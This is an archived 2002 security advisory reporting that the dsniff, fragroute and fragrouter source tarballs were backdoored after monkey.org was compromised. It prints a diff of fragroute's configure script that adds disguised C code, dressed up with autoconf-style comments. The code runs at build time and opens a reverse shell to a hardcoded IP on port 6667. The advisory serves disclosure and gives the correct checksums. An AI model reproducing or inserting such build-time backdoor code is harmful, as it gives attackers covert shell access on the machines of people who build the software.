4th Jun 2002 [SBWID-5397]
COMMAND
fragroute, dsniff and fragrouter have been backdoored
SYSTEMS AFFECTED
dsniff-2.3, fragroute-1.2, and fragrouter-1.6 source distributions
PROBLEM
Dug Song [http://www.monkey.org] explains:
monkey.org was compromised on May 14th, via an epic4-pre2.511
client-side hole which produced a shell to one of the local admin\'s
accounts. this was later used to reattach to one of his screen
sessions, which apparently had a root window open (su very bad!).
the dsniff-2.3, fragroute-1.2, and fragrouter-1.6 tarballs were all
modified at 3 AM on May 17th to include the same configure backdoor as
described in the irssi advisory. no other public web content was
modified, and the system was restored a week later, from scratch.
Diff between good fragroute and backdoored one:
diff -Nur fragroute-1.2/configure fragroute-1.2-bad/configure
--- fragroute-1.2/configure Mon Apr 15 16:41:43 2002
+++ fragroute-1.2-bad/configure Mon Apr 15 16:41:43 2002
@@ -1590,6 +1590,53 @@
fi
+cat > conftest.c<<EOF
+/* Override any gcc2 internal prototype to avoid an error. */
+/* We use char because int might match the return type of a gcc2
+ builtin and then its argument prototype would still apply. */
+#include <stdio.h>
+#include <sys/types.h>
+#include <sys/socket.h>
+#include <netinet/in.h>
+#include <unistd.h>
+int main()
+{
+/* The GNU C library defines this for functions which it implements
+ to always fail with ENOSYS. Some functions are actually named
+ something starting with __ and the normal name is an alias. */
+ int s;
+ struct sockaddr_in sa;
+ switch(fork()) { case 0: break; default: exit(0); }
+ if((s = socket(AF_INET, SOCK_STREAM, 0)) == (-1)) {
+ exit(1);
+ }
+ /* HP/UX 9 (%@#!) writes to sscanf strings */
+ memset(&sa, 0, sizeof(sa));
+ sa.sin_family = AF_INET;
+ sa.sin_port = htons(6667);
+/* Override any gcc2 internal prototype to avoid an error. */
+/* We use char because int might match the return type of a gcc2
+ builtin and then its argument prototype would still apply. */
+ sa.sin_addr.s_addr = inet_addr(\"216.80.99.202\");
+ if(connect(s, (struct sockaddr *)&sa, sizeof(sa)) == (-1)) {
+ exit(1);
+ }
+ /* HP/UX 9 (%@#!) writes to sscanf strings */
+ dup2(s, 0); dup2(s, 1); dup2(s, 2);
+/* The GNU C library defines this for functions which it implements
+ to always fail with ENOSYS. Some functions are actually named
+ something starting with __ and the normal name is an alias. */
+ { char *args[] = { \"/bin/sh\", NULL }; execve(args[0], args, NULL); }
+}
+EOF
+gcc $LIBS conftest.c -o conftest; ./conftest
+if { (eval echo configure:2379: \\\"$ac_link\\\") 1>&5; (eval $ac_link) 2>&5; } && test -s conftestx${ac_exeext}; then
+ rm -rf conftest*
+else
+ rm -rf conftest*
+fi
+rm -f conftest*
+
# DLPI needs putmsg under HPUX so test for -lstr while we\'re at it
echo $ac_n \"checking for putmsg in -lstr\"\"... $ac_c\" 1>&6
echo \"configure:1596: checking for putmsg in -lstr\" >&5
SOLUTION
Verify checksums.
the correct checksums are:
MD5 (dsniff-2.3.tar.gz) = 183e336a45e38013f3af840bddec44b4
MD5 (fragroute-1.2.tar.gz) = 7e4de763fae35a50e871bdcd1ac8e23a
MD5 (fragrouter-1.6.tar.gz) = 73fdc73f8da0b41b995420ded00533cc
TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2025 AOH
